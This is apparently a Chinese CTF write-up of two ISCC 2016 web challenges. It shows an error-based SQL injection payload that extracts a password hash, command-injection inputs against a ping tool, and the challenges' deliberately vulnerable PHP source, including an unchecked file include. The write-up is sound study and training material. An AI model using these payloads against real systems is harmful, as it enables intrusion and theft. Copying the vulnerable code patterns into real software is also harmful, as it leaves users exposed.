偶然看到的比赛,我等渣渣跟风做两题,剩下的题目工作太忙没有时间继续做。

第1题 sql注入:

题目知识

   考察sql注入知识,题目地址:http://101.200.145.44/web1//index.php

做题过程

第一步:注入Playload

    user=flag&pass=' or updatexml(1,concat(0x7e,(select pw from user limit 1,1 )),0)# '

第二步:注入效果

    Masel's secure site 重置数据库 Error: XPATH syntax error: '~*75DBBA7B5806E761411'

第三步:获取源码,得知用户名为flag,使用注入出的密码登录可得到flag

    用户名为flag 密码为:*75DBBA7B5806E761411
Loggedin!Flag:5a2f5d8f-58fa-481b-a19f-9aab97ba6a4b

相关源码 

http://101.200.145.44/web1//index.php.txt

<html>
<head>
Masel's secure site
</head>
<body> <a href="setup-db.php">重置数据库</a> <?php
include("auth.php");
$servername = $host;
$username = $dbuser;
$password = $dbpass;
$database = $dbname; error_reporting(0);
if($_POST["user"] && $_POST["pass"]) {
$conn = mysqli_connect($servername, $username, $password, $database);
if ($conn->connect_error) {
die("Connection failed: " . mysqli_error($conn));
}
$user = $_POST["user"];
$pass = $_POST["pass"]; $sql = "select user from user where pw='$pass'";
//echo $sql;
$query = mysqli_query($conn,$sql);
if (!$query) {
printf("Error: %s\n", mysqli_error($conn));
exit();
}
$row = mysqli_fetch_array($query);
//echo $row["pw"];
if ($row[user]){
if ($row[user] == "flag" && $user=="flag") {
echo "<p>Logged in! Flag: ****************** </p>";
}
else{
echo "<p>Password is right, but it's not for the flag </p>";
}
}
else {
echo("<p>Wrong password!</p>");
}
} ?> <form method=post action=index.php>
<input type=text name=user value="Username">
<input type=password name=pass value="Password">
<input type=submit>
</form>
</body>
<a href="index.php.txt">Source</a>
</html>

key

  1. Loggedin!Flag:5a2f5d8f-58fa-481b-a19f-9aab97ba6a4b

第2题:命令执行

题目知识

   考察命令执行的绕过,题目地址:http://101.200.145.44/web2//index.php

做题过程

第一步:得到文件名

    127.0.0.1|dir

127.0.0.1&&dir 执行结果
1C9976C230DA289C1C359CD2A7C02D48  index.php  index.php.txt

第二步:再次得到文件名

    127.0.0.1|dir 1C9976C230DA289C1C359CD2A7C02D48

执行结果
flag.php

第三步:直接访问

  1. 连接URL地址直接访问
  2. http://101.200.145.44/web2/1C9976C230DA289C1C359CD2A7C02D48/flag.php

相关源码

<?php
header("Content-type: text/html; charset=utf-8");
?>
<html>
<head>
<title></title>
</head>
<body>
<div align="center">
<h1 al>我刚做了一个ping命令的小工具,快试一下吧!</h1> <div >
<p>请输入目标IP</p>
<form name="ping" action="index.php" method="post">
<input type="text" name="ip" size="30">
<input type="submit" value="submit" name="submit">
</form>
</div>
<div>
</body>
</html>
<?php
if( isset( $_POST[ 'submit' ] ) ) { $target = $_REQUEST[ 'ip' ];
if(preg_match('/dir|cd|^(?:[0-9]{1,3}\.){3}[0-9]{1,3}$/',$target))
{
// Determine OS and execute the ping command.
if (stristr(php_uname('s'), 'Windows NT')) { $cmd = shell_exec( 'ping ' . $target );
echo '<pre>'.iconv('GB2312', 'UTF-8',$cmd).'</pre>'; } else
{
$cmd = shell_exec( 'ping -c 3 ' . $target );
echo '<pre>'.iconv('GB2312', 'UTF-8',$cmd).'</pre>';
}
}
else
echo "输入格式不正确!";
}
if( isset($_GET['file']))
{
include($_GET['file']);
}
?>

key

  1. flag{0d143dcd-5b29-4f4f-9b16-73665aeb45a8}

【CTF WEB】ISCC 2016 web 2题记录的更多相关文章

  1. [原题复现]-HITCON 2016 WEB《babytrick》[反序列化]

    前言 不想复现的可以访问榆林学院信息安全协会CTF训练平台找到此题直接练手 HITCON 2016 WEB -babytrick(复现) 原题 index.php 1 <?php 2 3 inc ...

  2. Web前端错题模糊题记录

    title: Web前端错题模糊题记录 toc: true date: 2018-09-20 10:04:36 categories: Web tags: HTML CSS JavaScript HT ...

  3. 攻防世界Web刷题记录(进阶区)

    攻防世界Web刷题记录(进阶区) 1.baby_web 发现去掉URLhttp://111.200.241.244:51461/1.php后面的1.php,还是会跳转到http://111.200.2 ...

  4. 攻防世界Web刷题记录(新手区)

    攻防世界Web刷题记录(新手区) 1.ViewSource 题如其名 Fn + F12 2.get post 3.robots robots.txt是搜索引擎中访问网站的时候要查看的第一个文件.当一个 ...

  5. 攻防世界 web 新手练习 刷题记录

    1.view_source 既然让看源码,那就F12直接就能看到. 2.robots 先百度去简单了解一下robots协议 robots协议(robots.txt),robots.txt文件在网站根目 ...

  6. Velocity China 2016 Web 性能与运维大会:构建快速、可扩展的弹性网站

    Velocity China 2016 Web 性能与运维大会是一场关于构建快速.可扩展的弹性网站所需要的Web性能.运维及开发运维的训练.大会将于2016年12月1日在北京拉开帷幕,此次大会被众多业 ...

  7. WEB应用打成jar包全记录

    内容属原创,转载请注明出处 题外 由于项目的需求—不管是怎么产生的这个需求—总之,需要支持把一个web应用打成jar包供其他应用使用,这就有了下面的过程. 这个过程里用到了Spring和SpringM ...

  8. 刷题记录:[0CTF 2016]piapiapia

    目录 刷题记录:[0CTF 2016]piapiapia 一.涉及知识点 1.数组绕过正则及相关 2.改变序列化字符串长度导致反序列化漏洞 二.解题方法 刷题记录:[0CTF 2016]piapiap ...

  9. Web初学-入门和tomcat介绍记录

    一.WEB开发的相关知识 WEB,在英语中web即表示网页的意思,它用于表示Internet主机上供外界访问的资源. Internet上供外界访问的Web资源分为: 静态web资源(如html 页面) ...

随机推荐

  1. Leetcode 344.反转字符串 By Python

    请编写一个函数,其功能是将输入的字符串反转过来. 示例: 输入:s = "hello" 返回:"olleh" 思路 Python里面的切片用来解决这个问题就很快 ...

  2. 关于TCP连接状态的解释

    TCP各个状态主要存在于三次握手和四次挥手的过程 1.TCP建立连接时的三次握手: 服务端应用监听端口处于LISTEN状态,等待建立连接. 第一次握手:客户端发送SYN=一个随机数,然后进入SYN_S ...

  3. 用 Vue 开发一个简单的答题应用(一)

    Vue 之类的 MVVM 框架,能帮助我们用更少的代码实现复杂的业务. 为了简单一点,开发计划分成三阶段: 一,数据写死,实现基本的答题效果.支持多种题型. 二,使用本地存储保存数据,支持题目录入的功 ...

  4. UDP网路会议室的代码

    UDP网络会议室视频已经录制好,这里贴上代码仅供参考 MainWindow代码: using System; using System.Collections.Generic; using Syste ...

  5. python---session(tornado中使用)缓存

    session.py插件 # coding:utf8 # __author: Administrator # date: // # /usr/bin/env python import config ...

  6. vuex2.0源码分析

    当我们用vue在开发的过程中,经常会遇到以下问题 多个vue组件共享状态 Vue组件间的通讯 在项目不复杂的时候,我们会利用全局事件bus的方式解决,但随着复杂度的提升,用这种方式将会使得代码难以维护 ...

  7. java keytool证书工具使用小结【转】

    java keytool证书工具使用小结 keytool导入导出多条目对比 在Security编程中,有几种典型的密码交换信息文件格式: DER-encoded certificate: .cer, ...

  8. Java高并发秒杀API之高并发优化

    ---恢复内容开始--- 第1章 秒杀系统高并发优化分析   1.为什么要单独获得系统时间 访问cdn这些静态资源不用请求系统服务器 而CDN上没有系统时间,需要单独获取,获取系统时间不用优化,只是n ...

  9. HDU - 3564 Another LIS(LIS+线段树)

    http://acm.hdu.edu.cn/showproblem.php?pid=3564 题意 给出1~n的插入顺序,要求每次插入之后的LIS 分析 首先用线段树还原出最终序列.因为插入的顺序是按 ...

  10. UVALive - 7639 G - Extreme XOR Sum(思维)

    题目链接 题意 给出一个序列,相邻两两异或,生成一个新序列,再相邻两两异或,直到只剩下一个元素,问最后结果为多少.m个查询,每次都有一个待查询区间. 分析 既然有多组查询,n只是1e4,那么可以考虑预 ...